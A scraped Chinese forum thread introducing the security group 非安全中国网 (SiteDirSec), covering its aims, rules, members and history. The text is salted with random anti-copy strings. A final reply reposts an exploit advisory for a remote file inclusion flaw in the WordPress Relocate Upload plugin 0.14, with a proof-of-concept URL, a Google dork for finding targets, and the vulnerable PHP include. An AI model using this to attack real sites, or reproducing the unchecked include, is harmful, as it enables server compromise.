返回列表 发帖

非安全中国网百科版介绍!

一、关于非安全中国网( `- C# t5 n# J2 ?4 Q9 w" l# o
专业的 爱国的 网络安全组织
; B& W/ s. H+ s. c: u2 z! T非安全中国网官方的URL地址http://www.sitedirsec.com/
3 o' A, [) |& f技术范围:
$ W( S2 s( \3 s2 U* W; ^% n
安全漏洞研究与发布,企业安全信息报告,网络基础设施安全漏洞识别,安全防范措施定制,评估企业内部系统和机密信息风险,安全技术交流,主攻方向WEB类服务器安全检测.  * J/ Y* K/ v* Q

, W  K1 u5 [3 b, q9 W' U+ W( b二、非安全中国网的命名 9 Q5 n2 t$ a' a, N$ t
 
% c2 W4 O  t9 d4 m0 I: m: p( w非安全中国网的意思是用不安全的技术手段,创造一个安全的环境,这个就是我们的口号:不安全。所以安全。但是很多人都把《非安全—黑客手册》,非安全中国网与网络上发布杂志的《非安全黑客手册》机构无任何关系.  
  e4 B7 }: u/ d# {论坛的站长为杨过也上网。  
) X' f6 O4 C" D* R3 h8 C论坛的创建时间是2007年7月28日。  
/ }; l+ ?, z# S; I% M非安全中国网的精神是平等、友爱、分享、互助、公平、公正、平等。5 \" {& q! n8 Z

. J/ I' R/ T: Y三、发展方面
3 Y( N  X9 E& R
4 e1 ~! k* _6 l1 w( I8 g
助力个人转型进入网络安全企业展示自我 便捷安全领域企业准确招募网络安全人才
" `7 ]/ c  O6 {2 v# `$ t. r2 i8 {% u9 u% q
四、管理制度4 a; a, J5 A2 _( f* }' o6 n+ c; U7 s

& A$ ^' W$ c  l作为一个互联网漏洞发布交流平台,我们严格遵守非安全中国网团队管理人员制定的各种管理制度,具体包括以下几项:
# R0 l& ~- T, v5 }( R3 Z  ~5 E
1.QQ群管理制度
* G4 U/ X  J& Z4 m# \2.论坛管理制度
5 p+ ^6 t( _! g$ ]/ r$ ?6 y3.会员审核制度
5 N8 l5 j, ^# ^# X, }$ U4.团队管理制度
: R0 g# l$ t0 `+ O9 D- P& i5.外部及内部事务管理制度
. ]# J" q5 P& u- L6.FTP资源管理制度
; I4 K) c  f0 G0 p7.敏感信息保密制度4 y/ K; L: b* T2 J7 _

# C7 l  Q/ m. ^# c* W! s五、管理成员构成) x9 f4 _, @; {$ R+ x0 V! Q

# g' u. Z* Z. a! ]* w4 a似水无痕 ╰ァ唸從偂 無情 黑海洋 壞壊 夜溪 樂壇之仔 沙僧 笨蛋》活该 CC jesus 八戒 pow78781
; e" r4 B3 i6 N9 ~$ K8 \6 r% |h1ck5r Wholelife 口水 小鱼儿 穷人一个 黄昏 h4ck3ber 青春是唯一 紫色溟渊 Dark 瑞 佐 (排名不分先后); ]4 c( w# V3 _, q
以及非安全中国各QQ群群主和长期关心和支持非安全中国的银河系黑客群安全厂商QQ群的各位朋友!
, r' D2 @' e, S0 E) ?& x
% G! B6 s2 y7 T1 i" y/ t3 n2 _7 l$ s
六、我们的信念
( k+ v+ C/ q8 ]/ o( R) a. F- Z2 V; t' H! n
免费:非安全成立以来自始自终保持我们的原则:非盈利性、提供良好技术交流平台。, v% o# p9 R# G: F8 Q# z
平等:非安全就是一个大家庭,非安全最重要的信念就是平等。我们观察到目前众多的网络安全爱好者之间技术交流存在天生不平等,不尊重,甚至还充满铜臭味。对于刚入门的朋友来说,因为没有一个纯净的技术讨论交流的平台,感觉经常被鄙视又担心花费金钱购买VIP、拜师被骗,从而放弃对这门技术爱好。在非安全大家庭里面没有VIP、没有低贱与尊卑。我们为平等而努力。" K* U% e+ X& v  T  J4 _* x; L# E

. P1 o+ n  U" W' i自由:非安全成立数年来已经创建有几十个群讨论,方便来自五湖四海各个技术领域的朋友进行讨论,对于对某技术有独到见解的爱好者,非安全可以很好提供展现自我的舞台,可以开设相关专区进行讨论,相关群进行交流等等!从而达到真正的技术自由。
# d' {& |7 z0 \- x) r, J9 e* K9 D4 E* B$ P
共享:我们一直本着共享精神,发布最新漏洞、提供最新资源、交流经验、讨论最新资讯,让更多爱好者共同进步!: A6 H+ N2 b* m
. j  S0 D# R0 ^2 u1 p, P. N- o
七、非安全中国网发展历程( j$ d" a2 h. o8 Q; B
; N5 m8 N) ~5 t5 S( R  ^1 Z
2007-07 - SiteDir网站代码开始编写,初步建立网站内容分类,管理人员2人。
6 E! p1 A! `. N$ ^" z# J2007-08 - SiteDir.Com.Cn开始提供安全信息资料录入了有关漏洞信息。; m; ^; L, b) K' H+ M3 e* W
2007-10 - SiteDir开通会员群。
& G& J: h* R$ m: O0 T2008-02 - SiteDir网站功能更新,进入程序测试版Beta 1.1。7 w, V$ g0 s+ {$ v0 n  K( z
2008-06 - 非安全中国网内部FTP存储服务开通,对QQ群会员开通。
& ~8 m, J  F6 Q0 C- ?2009-02 - SiteDir会员群急速扩张,管理团队初步开始建立。( X3 H) Z% d2 x8 p, C, R" ]
2009-06 - SiteDir网站功能更新,网站程序功能扩张进入程序Beta 1.2版。" n, V1 P1 l: q! s0 H
2010-03 - 管理团队建立,团队管理组人员达到30人左右,录入信息量达到1000条。
$ u, q2 U1 r# u% ?. f2010-05 - 论坛管理组实现人员管理重组,QQ交流群突破13个,FTP服务器实现管制。
# h# }6 V' d5 F: @- K+ K% z2010-07 - 论坛进行第一次活动组织与策划。( i7 r, Y; M$ {( u' |( z
2010-08 - 主站受外力因素,和谐指数持续上升,管理组预备方案。
2 h2 o: ~9 T- [2010-09 - 主站功能更新,预备启用网络新域名Www.SiteDirSEC.Com" H+ P; O5 ?' W# u! X6 d
2010-10 - 管理组第一次全体会议,制定7项管理规定。
# u' M7 D# v% v2 p0 E. w. H, Z2010-11 - 添加主站漏洞类型统计图,启用新域名并开发支持管理组规定的在线审核系统(进行中...)。5 t+ G. E. C) {* M

$ d' M6 Z% p5 y5 G* ]. A0 T! q6 t5 o2 J+ R) L) ~' L
PS:自由、免费、共享、平等!!我们一直在努力!
6 F% M$ Q3 k$ j9 I2 m不安全,所以安全——非安全中国网
* E( T7 l, H, W  ?' q0 ?+ `

8 v4 R  X' E- W( M  A百度百科:http://baike.baidu.com/history/id=16353129
/ O! {; e9 R- B/ G; w$ H, l0 z4 DSOSO百科:http://baike.soso.com/h10400946.htm?sp=l104009472 [% v! Z" ?7 u/ q2 T& [$ m4 O
互动百科:http://www.hudong.com/wiki/%E9%9D%9E%E5%AE%89%E5%85%A8%E4%B8%AD%E5%9B%BD%E7%BD%91
, u/ n* ^: J. Y- n, g/ u* `

 

您可能还想看的主题:

青年因上传**知识文档被判刑半年

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

"自由、免费、共享、平等!!我们一直在努力.Fighting!!"

TOP

1# webmaster 1 Y/ y  U  T; O, c6 s! K
% V- y7 A9 c! F9 z! h1 O
+ T& {. h' L5 M; m( n
  这么快沙发就没了:'( + O, v" a; z" P+ c6 z+ X

0 p/ M& s3 w, K. ]4 F
' l3 J5 v5 v/ b5 h& S! X; F    我很菜,但我一直在努力。6 x7 y0 v* ^* M  K5 z; A2 v
                                   我们也一直在努力,平等、友爱、分享、互助、公平、公正
" G" r0 `* c- z3 ?8 |                                                                                                                                我们一直在努力!( \9 V  s! g2 B, r& L$ P
                                                                                                                                不安全,所以安全——非安全中国网
, h4 t9 O' Z* l3 I2 ?

& Q6 N- t0 a5 V( |
- x9 v* x1 E" {! H1 s

TOP

技术净土

TOP

技术无止境,.

TOP

技术无黑白

TOP

呀呀,好好喜欢站长论坛这个地方哦, q2 O. x; R5 r* A3 b

1 @7 O) ?; b5 B) L; Q$ U2 @. k+ I7 g. ~
6 l# X9 y+ x5 I8 |+ v# J

. k! S- b5 C3 i4 b6 f, F4 U4 d0 _# _/ Y7 z

2 b  a6 t7 a7 j: P  t
  ]4 s9 J# h$ ?4 S* w* S. ~( T( ~4 s3 h9 Q0 ^+ _0 [
" e; m% v% S7 X* s8 C
' ^3 Q3 X2 l! u+ ]

! D" K7 i, v; t# N0 a$ L; B
/ C9 a6 v6 H( h( m0 U% N' o/ |& D# V' F( j8 |9 O! b. B
% c# Y# O% N( A$ T0 V. I2 L3 w. l
; K  X# o# r3 ?6 c6 x- X

) d! g) s! q, ?. O
7 x' ^, E2 ~: B# k1 v5 b
& N4 n$ y  u6 l2 q" U( L2 I& Y公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Wordpress Relocate上传插件0.14 远程文件包含漏洞
# Exploit Title: Relocate Upload Wordpress plugin RFI& n+ @5 c  k# o/ R/ i) R* S1 e; [: W
# Google Dork: inurl:wp-content/plugins/relocate-upload' ?* {- v, H7 l9 z% @# w
# Date: 09/19/2011& o2 x, t9 F1 v4 K; K& Y2 ?
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing). O/ `* N( t9 p  U: Y; f
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
, e& V& L: C7 i% Z) G: k. }( J# Version: 0.14 (tested)

* j4 H' w! g' w% s
---+ Z  Q' ~- q% z* ?. @
PoC5 x4 C- e/ W+ J3 z9 [" h; O' a
---! Z: T4 B. O/ C$ }4 B/ c6 `
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
$ Q+ u6 m2 m* I9 _2 @" K
---* V+ }6 t: K7 Q
Vulnerable Code
1 }5 p* c$ W2 Q- J( U. m! C---4 y- ~& [0 o  s9 I) d" T% L
// Move folder request handled when called by GET AJAX
+ y9 Y5 m8 T: J, e* vif (isset($_GET['ru_folder']))
+ X, J! b+ A: K+ \* F% y- N( a{       // WP setup and function access
- w7 K! d/ e* G% ^+ K# Z        define('WP_USE_THEMES', false);. G+ h$ Y; F' I+ ?
        require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter
  ?- J/ p& a6 _: C3 x- K
) S" T5 \: G% K* B

6 l( V8 k# o! \+ t" Z' W2 z+ l4 E0 D: f" W' c

9 a) |+ ^7 {" P. j9 [' y$ [
" U7 G+ O! d" g) p4 K# y
  a3 U. c! x# @% A8 `
* L  O9 {; e9 A* [! f9 ?3 W
$ P8 G- f2 M* Y% E5 D  _1 X0 i2 [& M' O' s& T

. |) d4 W4 X; x, i0 y% b
1 D# s/ C. t! w( g
9 e% h+ o; @+ F2 y; J3 c! A( {1 U. v: v

5 U* f4 s. a% P# o8 ?3 k$ s  G. s8 o0 V+ q  X( d

8 t5 Q4 A, c0 \$ \7 Y; r! l
" G0 O$ m. |- w0 `+ w5 X0 @
4 h8 t3 t! |+ M7 m- {0 G
7 H% p3 d3 N; T- j
) ?9 R$ g; @% n" G# n' n0 [5 `公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表